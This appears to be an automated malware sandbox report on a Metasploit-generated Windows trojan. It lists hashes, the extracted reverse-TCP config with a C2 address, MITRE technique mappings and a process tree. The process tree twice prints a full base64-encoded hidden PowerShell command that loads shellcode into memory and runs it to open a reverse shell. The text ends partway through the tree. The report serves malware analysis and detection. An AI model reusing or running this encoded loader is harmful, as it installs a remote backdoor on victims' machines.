metasploit | b4e016711dd41b45bb52a3a45d7029fd106da804436a2f4ad1bc854fbd16fa70

General

Target

b4e016711dd41b45bb52a3a45d7029fd106da804436a2f4ad1bc854fbd16fa70N.exe
Size

17KB
MD5

d611d8f472f1f149e1cb216789afebd0
SHA1

9a7e8e4e068e367cfd6e6da54b75bb5ae6232220
SHA256

b4e016711dd41b45bb52a3a45d7029fd106da804436a2f4ad1bc854fbd16fa70
SHA512

3b9829e708b88f6d022e2201cf04528b648e13ec6fc5a9bcb80e901a6fff4d83462146d0e2168281534f0c4230251f987848680985dc1cdb26b6f52c3fb05857
SSDEEP

384:yEEoLO56ayzcMj+2FbEiwtMwicYyINejH517p8h:FE8O56lcVwwicjINen7S

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

192.168.1.10:4444

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4012	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4012	powershell.exe
4012	powershell.exe
744	powershell.exe
744	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4012	powershell.exe
Token: SeDebugPrivilege	744	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 4376 wrote to memory of 1472	4376	b4e016711dd41b45bb52a3a45d7029fd106da804436a2f4ad1bc854fbd16fa70N.exe	83
PID 4376 wrote to memory of 1472	4376	b4e016711dd41b45bb52a3a45d7029fd106da804436a2f4ad1bc854fbd16fa70N.exe	83
PID 1472 wrote to memory of 4012	1472	cmd.exe	84
PID 1472 wrote to memory of 4012	1472	cmd.exe	84
PID 4012 wrote to memory of 744	4012	powershell.exe	85
PID 4012 wrote to memory of 744	4012	powershell.exe	85
PID 4012 wrote to memory of 744	4012	powershell.exe	85
PID 744 wrote to memory of 396	744	powershell.exe	86
PID 744 wrote to memory of 396	744	powershell.exe	86
PID 744 wrote to memory of 396	744	powershell.exe	86
PID 396 wrote to memory of 536	396	csc.exe	87
PID 396 wrote to memory of 536	396	csc.exe	87
PID 396 wrote to memory of 536	396	csc.exe	87

C:\Users\Admin\AppData\Local\Temp\b4e016711dd41b45bb52a3a45d7029fd106da804436a2f4ad1bc854fbd16fa70N.exe
"C:\Users\Admin\AppData\Local\Temp\b4e016711dd41b45bb52a3a45d7029fd106da804436a2f4ad1bc854fbd16fa70N.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JABiAGkAcwAgAD0AIAAnACQAdwBYAFoAVQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJAB3AFgAWgBVACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABjADUALAAwAHgAYgBhACwAMAB4ADcAYwAsADAAeAAzADUALAAwAHgAYQA4ACwAMAB4AGQAOQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADIAYgAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANQAwACwAMAB4ADEANwAsADAAeAA4ADMALAAwAHgAZQA4ACwAMAB4AGYAYwAsADAAeAAwADMALAAwAHgAMgBjACwAMAB4ADIANgAsADAAeAA0AGEALAAwAHgAMgBjACwAMAB4ADMAMAAsADAAeABhADAALAAwAHgAMAA1ACwAMAB4AGMAZgAsADAAeABjADgALAAwAHgAMwAxACwAMAB4ADcAYQAsADAAeABlADEALAAwAHgAMQBhACwAMAB4ADUANQAsADAAeABmADEALAAwAHgANQAzACwAMAB4AGEAYQAsADAAeAAxAGQALAAwAHgANQA3ACwAMAB4ADUAOAAsADAAeAA0ADEALAAwAHgANwAzACwAMAB4ADQAYwAsADAAeABlADkALAAwAHgAYgAwACwAMAB4ADcAYgAsADAAeABkAGIALAAwAHgAYQAzACwAMAB4ADEAYwAsADAAeAAwAGYALAAwAHgANQAxACwAMAB4ADEAYwAsADAAeAA1ADEALAAwAHgAZgAwACwAMAB4AGEANwAsADAAeAA5AGMALAAwAHgAMwBkACwAMAB4ADMAMgAsADAAeABhADkALAAwAHgANgAwACwAMAB4ADMAZgAsADAAeAA2ADcALAAwAHgAMAA5ACwAMAB4ADUAOAAsADAAeABmADAALAAwAHgANwBhACwAMAB4ADQAOAAsADAAeAA5AGQALAAwAHgANAA3ACwAMAB4AGYAMAAsADAAeABhADUALAAwAHgANwAzACwAMAB4AGQAYwAsADAAeABhADgALAAwAHgAMgA5ACwAMAB4AGYAZgAsADAAeABhADAALAAwAHgANwAwACwAMAB4ADQAYgAsADAAeAAyAGYALAAwAHgANwAzACwAMAB4ADAAMgAsADAAeAAwAGIALAAwAHgAYgA3ACwAMAB4AGYAZQAsADAAeABkADQALAAwAHgAZgA4ACwAMAB4ADAAYgAsADAAeAAwADEALAAwAHgAMAA1ACwAMAB4ADgAYgAsADAAeABjAGMALAAwAHgAMgAxACwAMAB4AGYANQAsADAAeAAwADcALAAwAHgAYQA0ACwAMAB4ADMAOQAsADAAeABmADQALAAwAHgAYwA0ACwAMAB4AGIAMAAsADAAeABmADAALAAwAHgAOAAyACwAMAB4AGQANgAsADAAeABmADMALAAwAHgAOAA5ACwAMAB4ADUAZgAsADAAeABhAGMALAAwAHgAMwA1ACwAMAB4ADcAMgAsADAAeAA5AGUALAAwAHgANgA0ACwAMAB4ADAANAAsADAAeAA0AGMALAAwAHgANgAwACwAMAB4ADQANwAsADAAeAA2AGEALAAwAHgAZQAwACwAMAB4ADYAMgAsADAAeAA5AGYALAAwAHgANABkACwAMAB4ADEAOAAsADAAeAAxADEALAAwAHgAZQBiACwAMAB4AGEAZAAsADAAeABhADUALAAwAHgAMgAyACwAMAB4ADIAOAAsADAAeABjAGYALAAwAHgANwAxACwAMAB4AGEANgAsADAAeABhAGYALAAwAHgANwA3ACwAMAB4AGYAMgAsADAAeAAxADAALAAwAHgAMQA0ACwAMAB4ADgAOQAsADAAeABkADcALAAwAHgAYwA3ACwAMAB4AGQAZgAsADAAeAA4ADUALAAwAHgAOQBjACwAMAB4ADgAYwAsADAAeABiADgALAAwAHgAOAA5ACwAMAB4ADIAMwAsADAAeAA0ADAALAAwAHgAYgAzACwAMAB4AGIANgAsADAAeABhADgALAAwAHgANgA3ACwAMAB4ADEANAAsADAAeAAzAGYALAAwAHgAZQBhACwAMAB4ADQAMwAsADAAeABiADAALAAwAHgAMQBiACwAMAB4AGEAOQAsADAAeABlAGEALAAwAHgAZQAxACwAMAB4AGMAMQAsADAAeAAxAGMALAAwAHgAMQAyACwAMAB4AGYAMQAsADAAeABhAGUALAAwAHgAYwAxACwAMAB4AGIANgAsADAAeAA3ADkALAAwAHgANQBjACwAMAB4ADEANAAsADAAeABjADYALAAwAHgAOAAxACwAMAB4ADkAZQAsADAAeAAxADkALAAwAHgAOQBhACwAMAB4ADEANQAsADAAeAA1ADIALAAwAHgAZAA3ACwAMAB4ADIANQAsADAAeABlADYALAAwAHgAZgBjACwAMAB4ADYAMAAsADAAeAA1ADUALAAwAHgAZAA0ACwAMAB4AGEAMwAsADAAeABkAGEALAAwAHgAZgAxACwAMAB4ADUANAAsADAAeAAyAGIALAAwAHgAYwA0ACwAMAB4ADAANgAsADAAeABlAGMALAAwAHgAMwBiACwAMAB4AGYANwAsADAAeABkADkALAAwAHgANQA2ACwAMAB4ADIAYgAsADAAeAAwADYALAAwAHgAZABhACwAMAB4AGEANgAsADAAeAA2ADUALAAwAHgAYwBjACwAMAB4ADgAZQAsADAAeABmADYALAAwAHgAMQBkACwAMAB4AGUANQAsADAAeABhAGUALAAwAHgAOQBjACwAMAB4AGQAZAAsADAAeAAwAGEALAAwAHgANwBiACwAMAB4ADAAOAAsADAAeABkADQALAAwAHgAOQBjACwAMAB4ADQANAAsADAAeAA2ADUALAAwAHgAZQA5ACwAMAB4ADUANgAsADAAeAAyAGQALAAwAHgANwA0ACwAMAB4AGUAYQAsADAAeAA3ADcALAAwAHgAZgAxACwAMAB4AGYAMQAsADAAeAAwAGMALAAwAHgAMgA3ACwAMAB4ADUAOQAsADAAeAA1ADIALAAwAHgAOAAxACwAMAB4ADgANwAsADAAeAAwADkALAAwAHgAMQAyACwAMAB4ADcAMQAsADAAeAA2AGYALAAwAHgANAAwACwAMAB4ADkAZAAsADAAeABhAGUALAAwAHgAOABmACwAMAB4ADYAYgAsADAAeAA3ADcALAAwAHgAYwA3ACwAMAB4ADIANQAsADAAeAA4ADQALAAwAHgAMgBlACwAMAB4AGIAZgAsADAAeABkADEALAAwAHgAMwBkACwAMAB4ADYAYgAsADAAeAA0AGIALAAwAHgANAAwACwAMAB4AGMAMQAsADAAeABhADEALAAwAHgAMwAxACwAMAB4ADQAMgAsADAAeAA0ADkALAAwAHgANAA2ACwAMAB4AGMANQAsADAAeAAwAGMALAAwAHgAYgBhACwAMAB4ADIAMwAsADAAeABkADUALAAwAHgAZgA4ACwAMAB4ADQAYQAsADAAeAA3AGUALAAwAHgAOAA3ACwAMAB4AGEAZQAsADAAeAA1ADUALAAwAHgANQA0ACwAMAB4AGEAMgAsADAAeAA0AGUALAAwAHgAYwAwACwAMAB4ADUAMwAsADAAeAA2ADUALAAwAHgAMQA5ACwAMAB4ADcAYwAsADAAeAA1AGUALAAwAHgANQAwACwAMAB4ADYAZAAsADAAeAAyADMALAAwAHgAYQAxACwAMAB4AGIANwAsADAAeABlADYALAAwAHgAZQBhACwAMAB4ADMANwAsADAAeAA3ADgALAAwAHgAOQAwACwAMAB4ADEAMgAsADAAeABkADgALAAwAHgANwA4ACwAMAB4ADYAMAAsADAAeAA0ADUALAAwAHgAYgAyACwAMAB4ADcAOAAsADAAeAAwADgALAAwAHgAMwAxACwAMAB4AGUANgAsADAAeAAyAGEALAAwAHgAMgBkACwAMAB4ADMAZQAsADAAeAAzADMALAAwAHgANQBmACwAMAB4AGYAZQAsADAAeABhAGIALAAwAHgAYgBjACwAMAB4ADMANgAsADAAeAA1ADMALAAwAHgANwBiACwAMAB4AGQANQAsADAAeABiADQALAAwAHgAOABhACwAMAB4ADQAYgAsADAAeAA3AGEALAAwAHgANAA2ACwAMAB4AGYAOQAsADAAeAA0AGQALAAwAHgANAA2ACwAMAB4ADkAMQAsADAAeABjADcALAAwAHgAMwBiACwAMAB4AGEANgAsADAAeAAyADEAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAGUAMABoAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABlADAAaAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAZQAwAGgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABiAGkAcwApACkAOwAkAFUANwB0AFQAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABpAEwAYgBoACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGkATABiAGgAIAAkAFUANwB0AFQAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAVQA3AHQAVAAgACQAZQAiADsAfQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1472
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -window hidden -EncodedCommand JABiAGkAcwAgAD0AIAAnACQAdwBYAFoAVQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJAB3AFgAWgBVACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABjADUALAAwAHgAYgBhACwAMAB4ADcAYwAsADAAeAAzADUALAAwAHgAYQA4ACwAMAB4AGQAOQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADIAYgAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANQAwACwAMAB4ADEANwAsADAAeAA4ADMALAAwAHgAZQA4ACwAMAB4AGYAYwAsADAAeAAwADMALAAwAHgAMgBjACwAMAB4ADIANgAsADAAeAA0AGEALAAwAHgAMgBjACwAMAB4ADMAMAAsADAAeABhADAALAAwAHgAMAA1ACwAMAB4AGMAZgAsADAAeABjADgALAAwAHgAMwAxACwAMAB4ADcAYQAsADAAeABlADEALAAwAHgAMQBhACwAMAB4ADUANQAsADAAeABmADEALAAwAHgANQAzACwAMAB4AGEAYQAsADAAeAAxAGQALAAwAHgANQA3ACwAMAB4ADUAOAAsADAAeAA0ADEALAAwAHgANwAzACwAMAB4ADQAYwAsADAAeABlADkALAAwAHgAYgAwACwAMAB4ADcAYgAsADAAeABkAGIALAAwAHgAYQAzACwAMAB4ADEAYwAsADAAeAAwAGYALAAwAHgANQAxACwAMAB4ADEAYwAsADAAeAA1ADEALAAwAHgAZgAwACwAMAB4AGEANwAsADAAeAA5AGMALAAwAHgAMwBkACwAMAB4ADMAMgAsADAAeABhADkALAAwAHgANgAwACwAMAB4ADMAZgAsADAAeAA2ADcALAAwAHgAMAA5ACwAMAB4ADUAOAAsADAAeABmADAALAAwAHgANwBhACwAMAB4ADQAOAAsADAAeAA5AGQALAAwAHgANAA3ACwAMAB4AGYAMAAsADAAeABhADUALAAwAHgANwAzACwAMAB4AGQAYwAsADAAeABhADgALAAwAHgAMgA5ACwAMAB4AGYAZgAsADAAeABhADAALAAwAHgANwAwACwAMAB4ADQAYgAsADAAeAAyAGYALAAwAHgANwAzACwAMAB4ADAAMgAsADAAeAAwAGIALAAwAHgAYgA3ACwAMAB4AGYAZQAsADAAeABkADQALAAwAHgAZgA4ACwAMAB4ADAAYgAsADAAeAAwADEALAAwAHgAMAA1ACwAMAB4ADgAYgAsADAAeABjAGMALAAwAHgAMgAxACwAMAB4AGYANQAsADAAeAAwADcALAAwAHgAYQA0ACwAMAB4ADMAOQAsADAAeABmADQALAAwAHgAYwA0ACwAMAB4AGIAMAAsADAAeABmADAALAAwAHgAOAAyACwAMAB4AGQANgAsADAAeABmADMALAAwAHgAOAA5ACwAMAB4ADUAZgAsADAAeABhAGMALAAwAHgAMwA1ACwAMAB4ADcAMgAsADAAeAA5AGUALAAwAHgANgA0ACwAMAB4ADAANAAsADAAeAA0AGMALAAwAHgANgAwACwAMAB4ADQANwAsADAAeAA2AGEALAAwAHgAZQAwACwAMAB4ADYAMgAsADAAeAA5AGYALAAwAHgANABkACwAMAB4ADEAOAAsADAAeAAxADEALAAwAHgAZQBiACwAMAB4AGEAZAAsADAAeABhADUALAAwAHgAMgAyACwAMAB4ADIAOAAsADAAeABjAGYALAAwAHgANwAxACwAMAB4AGEANgAsADAAeABhAGYALAAwAHgANwA3ACwAMAB4AGYAMgAsADAAeAAxADAALAAwAHgAMQA0ACwAMAB4ADgAOQAsADAAeABkADcALAAwAHgAYwA3ACwAMAB4AGQAZgAsADAAeAA4ADUALAAwAHgAOQBjACwAMAB4ADgAYwAsADAAeABiADgALAAwAHgAOAA5ACwAMAB4ADIAMwAsADAAeAA0ADAALAAwAHgAYgAzACwAMAB4AGIANgAsADAAeABhADgALAAwAHgANgA3ACwAMAB4ADEANAAsADAAeAAzAGYALAAwAHgAZQBhACwAMAB4ADQAMwAsADAAeABiADAALAAwAHgAMQBiACwAMAB4AGEAOQAsADAAeABlAGEALAAwAHgAZQAxACwAMAB4AGMAMQAsADAAeAAxAGMALAAwAHgAMQAyACwAMAB4AGYAMQAsADAAeABhAGUALAAwAHgAYwAxACwAMAB4AGIANgAsADAAeAA3ADkALAAwAHgANQBjACwAMAB4ADEANAAsADAAeABjADYALAAwAHgAOAAxACwAMAB4ADkAZQAsADAAeAAxADkALAAwAHgAOQBhACwAMAB4ADEANQAsADAAeAA1ADIALAAwAHgAZAA3ACwAMAB4ADIANQAsADAAeABlADYALAAwAHgAZgBjACwAMAB4ADYAMAAsADAAeAA1ADUALAAwAHgAZAA0ACwAMAB4AGEAMwAsADAAeABkAGEALAAwAHgAZgAxACwAMAB4ADUANAAsADAAeAAyAGIALAAwAHgAYwA0ACwAMAB4ADAANgAsADAAeABlAGMALAAwAHgAMwBiACwAMAB4AGYANwAsADAAeABkADkALAAwAHgANQA2ACwAMAB4ADIAYgAsADAAeAAwADYALAAwAHgAZABhACwAMAB4AGEANgAsADAAeAA2ADUALAAwAHgAYwBjACwAMAB4ADgAZQAsADAAeABmADYALAAwAHgAMQBkACwAMAB4AGUANQAsADAAeABhAGUALAAwAHgAOQBjACwAMAB4AGQAZAAsADAAeAAwAGEALAAwAHgANwBiACwAMAB4ADAAOAAsADAAeABkADQALAAwAHgAOQBjACwAMAB4ADQANAAsADAAeAA2ADUALAAwAHgAZQA5ACwAMAB4ADUANgAsADAAeAAyAGQALAAwAHgANwA0ACwAMAB4AGUAYQAsADAAeAA3ADcALAAwAHgAZgAxACwAMAB4AGYAMQAsADAAeAAwAGMALAAwAHgAMgA3ACwAMAB4ADUAOQAsADAAeAA1ADIALAAwAHgAOAAxACwAMAB4ADgANwAsADAAeAAwADkALAAwAHgAMQAyACwAMAB4ADcAMQAsADAAeAA2AGYALAAwAHgANAAwACwAMAB4ADkAZAAsADAAeABhAGUALAAwAHgAOABmACwAMAB4ADYAYgAsADAAeAA3ADcALAAwAHgAYwA3ACwAMAB4ADIANQAsADAAeAA4ADQALAAwAHgAMgBlACwAMAB4AGIAZgAsADAAeABkADEALAAwAHgAMwBkACwAMAB4ADYAYgAsADAAeAA0AGIALAAwAHgANAAwACwAMAB4AGMAMQAsADAAeABhADEALAAwAHgAMwAxACwAMAB4ADQAMgAsADAAeAA0ADkALAAwAHgANAA2ACwAMAB4AGMANQAsADAAeAAwAGMALAAwAHgAYgBhACwAMAB4ADIAMwAsADAAeABkADUALAAwAHgAZgA4ACwAMAB4ADQAYQAsADAAeAA3AGUALAAwAHgAOAA3ACwAMAB4AGEAZQAsADAAeAA1ADUALAAwAHgANQA0ACwAMAB4AGEAMgAsADAAeAA0AGUALAAwAHgAYwAwACwAMAB4ADUAMwAsADAAeAA2ADUALAAwAHgAMQA5ACwAMAB4ADcAYwAsADAAeAA1AGUALAAwAHgANQAwACwAMAB4ADYAZAAsADAAeAAyADMALAAwAHgAYQAxACwAMAB4AGIANwAsADAAeABlADYALAAwAHgAZQBhACwAMAB4ADMANwAsADAAeAA3ADgALAAwAHgAOQAwACwAMAB4ADEAMgAsADAAeABkADgALAAwAHgANwA4ACwAMAB4ADYAMAAsADAAeAA0ADUALAAwAHgAYgAyACwAMAB4ADcAOAAsADAAeAAwADgALAAwAHgAMwAxACwAMAB4AGUANgAsADAAeAAyAGEALAAwAHgAMgBkACwAMAB4ADMAZQAsADAAeAAzADMALAAwAHgANQBmACwAMAB4AGYAZQAsADAAeABhAGIALAAwAHgAYgBjACwAMAB4ADMANgAsADAAeAA1ADMALAAwAHgANwBiACwAMAB4AGQANQAsADAAeABiADQALAAwAHgAOABhACwAMAB4ADQAYgAsADAAeAA3AGEALAAwAHgANAA2ACwAMAB4AGYAOQAsADAAeAA0AGQALAAwAHgANAA2ACwAMAB4ADkAMQAsADAAeABjADcALAAwAHgAMwBiACwAMAB4AGEANgAsADAAeAAyADEAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAGUAMABoAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABlADAAaAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAZQAwAGgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABiAGkAcwApACkAOwAkAFUANwB0AFQAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABpAEwAYgBoACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGkATABiAGgAIAAkAFUANwB0AFQAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAVQA3AHQAVAAgACQAZQAiADsAfQA=
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4012
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
